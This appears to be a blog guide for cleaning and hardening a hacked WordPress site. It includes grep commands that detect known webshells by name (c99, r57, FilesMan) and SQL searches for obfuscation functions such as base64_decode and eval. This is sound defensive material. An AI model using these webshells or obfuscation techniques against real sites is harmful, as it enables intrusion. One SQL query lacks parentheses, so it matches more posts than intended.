Your WordPress site is showing ads for casino games, redirecting visitors to spam pages, or your host just suspended the account with a malware warning. Your site has been hacked. The good news: it is recoverable, and in most cases your content is intact.
This guide walks through every step of a WordPress hack recovery: identifying what was compromised, isolating the damage, cleaning files and the database, removing attacker-created admin users, and hardening the site so it does not happen again. Work through it in order and do not skip the hardening section at the end.
Step 1: Confirm You Are Hacked (Not Just Broken)
Before spending hours cleaning a hack that is not there, confirm the site is actually compromised. Common signs:
- Google shows “This site may be hacked” warning in search results
- Visitors are redirected to unrelated domains
- Your host suspended the account citing malware or abuse
- The admin dashboard shows users you did not create
- Google Search Console shows a security issue notification
- Pages contain links or ads you did not add
- Wordfence or Sucuri flagged suspicious file changes
If you have not run a scan yet, do that now. Install Wordfence Security (free) and run a full scan, or use Sucuri SiteCheck at sitecheck.sucuri.net which scans from the outside without needing plugin access.
Step 2: Put the Site in Maintenance Mode and Take a Backup
Before making any changes, take a backup of the current (infected) state. You may need to reference specific files or database entries during the cleanup.
- Log into your host’s cPanel or server and download a full database backup via phpMyAdmin
- Download the entire wp-content folder via FTP or your host’s file manager
- Label the folder “infected-backup-2026” and keep it offline for reference
If your host provides staging or a file snapshot, take one now. This gives you a recovery point if you need to investigate specific malware behavior later.
Then put the site in maintenance mode to stop visitors from hitting infected pages while you clean:
# Add to .htaccess (remove after cleanup is complete):
RewriteEngine On
RewriteCond %{REMOTE_ADDR} !^YOUR.IP.HERE$
RewriteRule ^(.*)$ /maintenance.html [L,R=302]Step 3: Run a Full Malware Scan
Use at least two tools to scan for different malware signatures:
Wordfence
- Install and activate Wordfence Security from the plugin directory
- Go to Wordfence > Scan
- Click Start New Scan
- Review results, look for “File appears to be an unknown file in the WordPress core”, “File contains suspected malware”, and “Unknown file in WordPress core”
WP-CLI scan
If you have server access, check for PHP files in the uploads directory (a classic malware hiding spot):
find wp-content/uploads/ -name "*.php" -type f
find wp-content/ -name "*.ico" -type f # attackers hide PHP in .ico files
find . -name "eval-stdin.php" # common webshell namePHP files in the uploads directory should not exist under any normal circumstances. Any you find are malware and should be deleted.
Step 4: Remove Malicious Admin Users
Attackers almost always create a hidden admin user as a backdoor. Check your user list before doing anything else:
- Go to Users > All Users
- Filter by Administrator role
- Delete any accounts you do not recognize
- Change the passwords of all remaining admin accounts immediately
If you cannot access the admin dashboard, check the database directly:
-- List all admin users:
SELECT u.ID, u.user_login, u.user_email, u.user_registered
FROM wp_users u
INNER JOIN wp_usermeta m ON u.ID = m.user_id
WHERE m.meta_key = 'wp_capabilities'
AND m.meta_value LIKE '%administrator%'
ORDER BY u.user_registered DESC;
-- Delete a suspicious user (replace ID):
DELETE FROM wp_users WHERE ID = 99;
DELETE FROM wp_usermeta WHERE user_id = 99;Step 5: Reinstall WordPress Core
Replace all core WordPress files with a clean copy. This eliminates malware injected into wp-includes or wp-admin files without touching your content (which lives in wp-content and the database).
# Download fresh core (same version as your site)
wp core download --skip-content --force --allow-root
# Or via WP admin: Dashboard > Updates > Re-install WordPressThe --skip-content flag skips wp-content so your themes, plugins, and uploads are untouched. The --force flag overwrites existing core files even if they match the installed version, this is what cleans injected modifications.
After reinstalling core, verify file integrity:
wp core verify-checksums --allow-rootAny files that fail the checksum are still modified. Download the original from WordPress.org and replace them manually.
Step 6: Clean Plugins and Themes
Plugins and themes are the most common infection vector. After cleaning core, clean your plugin and theme files:
- Deactivate all plugins
- Delete every plugin and reinstall from WordPress.org or from a purchased download
- Do not restore plugin files from the infected backup, they may contain backdoors
- For premium plugins, download fresh copies from the vendor’s account portal
- Do the same for themes: delete and reinstall from the original source
- Remove any plugins or themes you no longer use. Deactivated plugins with known vulnerabilities are still exploitable
The most common WordPress hack vectors are nulled (pirated) plugins and themes. If you installed any plugin or theme from a source other than WordPress.org or the official vendor, remove it and do not reinstall it.
Step 7: Clean the Database
Attackers frequently inject malicious content into the database: spam links in post content, malicious code in wp_options, or hidden admin capabilities in usermeta.
Check wp_options for malicious values
-- Look for suspicious option values:
SELECT option_name, LEFT(option_value, 200) as option_value
FROM wp_options
WHERE option_value LIKE '%eval(%'
OR option_value LIKE '%base64_decode%'
OR option_value LIKE '%gzinflate%'
OR option_value LIKE '%str_rot13%';Check post content for injected links
-- Find posts with suspicious external links:
SELECT ID, post_title, LEFT(post_content, 300)
FROM wp_posts
WHERE post_status = 'publish'
AND post_content LIKE '%viagra%'
OR post_content LIKE '%casino%'
OR post_content LIKE '%payday loan%';For database spam links, the fastest cleanup approach is using the WP Toolkit or a plugin like Better Search Replace to find and remove known spam domains from post content.
Step 8: Reset All Credentials
After cleaning files and the database, rotate every credential that could have been compromised:
- WordPress secret keys and salts, generate new ones at https://api.wordpress.org/secret-key/1.1/salt/ and paste into wp-config.php. This logs out all active sessions including the attacker’s if they have an active cookie.
- All admin passwords, change every administrator account password to a unique, long password (20+ characters)
- Database password, change in your hosting control panel and update wp-config.php to match
- FTP/SFTP credentials, change in your hosting panel
- Hosting panel password, change your cPanel or Plesk login password
# Reset a WordPress user password via WP-CLI:
wp user update admin --user_pass="NewSecurePassword123!" --allow-rootStep 9: Remove the .htaccess Backdoor and Check for Webshells
Attackers modify .htaccess to redirect visitors or give themselves persistent access. Download your .htaccess file and compare it to the default WordPress .htaccess:
# Default WordPress .htaccess (what it should look like):
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPressDelete your current .htaccess and replace it with the default. Regenerate it via Settings > Permalinks > Save Changes.
Also check for PHP webshells (files that give attackers a browser-based terminal into your server):
grep -r "FilesMan" wp-content/ # common webshell identifier
grep -r "c99" wp-content/ # c99 shell
grep -r "r57" wp-content/ # r57 shell
grep -rl "base64_decode" wp-content/plugins/ | head -20Step 10: Request Google to Re-Crawl (If Blacklisted)
If Google marked the site as dangerous in search results, you need to request a review after cleaning:
- Go to Google Search Console
- Navigate to Security & Manual Actions > Security Issues
- Click Request a Review
- Describe what was compromised, what you cleaned, and what you changed to prevent recurrence
- Submit the request
Google typically reviews within 1 to 3 days for sites that were blacklisted due to malware. The “This site may be hacked” label is removed once Google confirms the site is clean.
Step 11: Harden WordPress to Prevent the Next Hack
Cleaning is only half the job. If you do not fix the vulnerability that let the attacker in, they will be back within days. Apply these hardening steps immediately after cleanup:
Update everything
Update WordPress core, all plugins, and all themes to current versions. Most hacks exploit known vulnerabilities in outdated software that has patches available.
Disable file editing from the admin
// Add to wp-config.php:
define('DISALLOW_FILE_EDIT', true);
define('DISALLOW_FILE_MODS', true);Block PHP execution in uploads
# Add to wp-content/uploads/.htaccess:
<Files "*.php">
Require all denied
</Files>Enable two-factor authentication
Install a 2FA plugin (WP 2FA, Two Factor) and require it for all administrator accounts. Even if an attacker has your password, they cannot log in without the second factor.
Limit login attempts
Install Limit Login Attempts Reloaded or enable Wordfence’s brute force protection to block IP addresses after repeated failed login attempts.
For a complete 20-point security hardening checklist to run every month, see our WordPress security audit checklist which covers file permissions, login hardening, SSL configuration, and HTTP security headers.
When to Restore from Backup Instead of Cleaning
If the infection is deep, widespread, or you cannot identify all the modified files after running scans, restoring from a known-clean backup is faster and more reliable than manual cleanup.
You need a backup from before the hack date. Check your host’s backup history or your backup plugin logs to find a restore point that predates the infection. Our guide on how to restore your WordPress site from a backup covers five restore scenarios including restoring when the site is completely down.
If you restore from backup, you must also change all credentials (passwords, salts, database password) after the restore. The vulnerability that allowed the original hack still exists on the restored site until you patch it.
Common WordPress Hack Types and What to Look For
| Hack Type | What You See | Where to Clean |
|---|---|---|
| SEO spam injection | Hidden links to casino/pharma/loan sites in post content | Database wp_posts, wp_postmeta |
| Redirect hack | Visitors redirected to spam sites | .htaccess, wp-config.php, theme functions.php |
| Admin user backdoor | Unknown user in administrator role | wp_users, wp_usermeta |
| File-based webshell | PHP files in uploads or plugin directories | wp-content/uploads/, plugin folders |
| Crypto miner | High CPU usage on server | Injected script tags in theme or plugin files |
| Phishing page | Host suspended account, fake login page hosted on site | wp-content/uploads/ subdirectories |
Frequently Asked Questions
Will I lose my posts and pages if I clean the hack?
No. Your posts, pages, and media are in the database and the uploads folder. The cleanup process replaces core files and plugins but leaves wp-content intact. You may need to remove specific infected files from wp-content, but your actual content (posts, images, product data) is in the database and is preserved.
How did my site get hacked if I had a strong password?
Most WordPress hacks do not involve guessing passwords. The most common vectors are: a plugin or theme with a known security vulnerability, a nulled (pirated) plugin containing malware, compromised FTP credentials, or shared hosting cross-contamination. A strong admin password does not protect against plugin vulnerabilities.
Should I pay a malware removal service?
For complex or persistent infections, yes. Sucuri and Wordfence both offer paid cleanup services. Sucuri charges a flat annual fee that includes unlimited cleanups. This is worth it if the free scan keeps finding new malware after multiple cleanup attempts or if you lack server access to clean files manually.
How long does WordPress hack recovery take?
For a straightforward infection (one plugin was the entry point, limited file modification), 2 to 4 hours following this guide. For deep or multi-vector infections with database spam, 4 to 8 hours or a full day. If you have a clean backup from before the hack date, restoration is faster than manual cleanup for severe cases.
My host said the account is suspended. Can I still clean it?
Yes. Contact your host and ask for temporary SSH or FTP access to clean the files. Most hosts will grant this for a limited time. Clean all infected files, then email support with a summary of what you removed so they can verify and reactivate the account.
You Can Recover From This
A hacked WordPress site is alarming but it is not a catastrophe. Most hacks are opportunistic attacks targeting known vulnerabilities in outdated software. Clean the files, remove the rogue users, rotate all credentials, update everything, and apply the hardening steps. Your content is almost certainly still there.
The single most important thing you can do after recovery is set up automatic backups with off-site storage. If it happens again, you will have a clean restore point and the recovery time drops from hours to minutes.
Beginner WordPress Tips First steps after WordPress install Hacked WordPress Fix Site Security wordpress security
Last modified: April 24, 2026
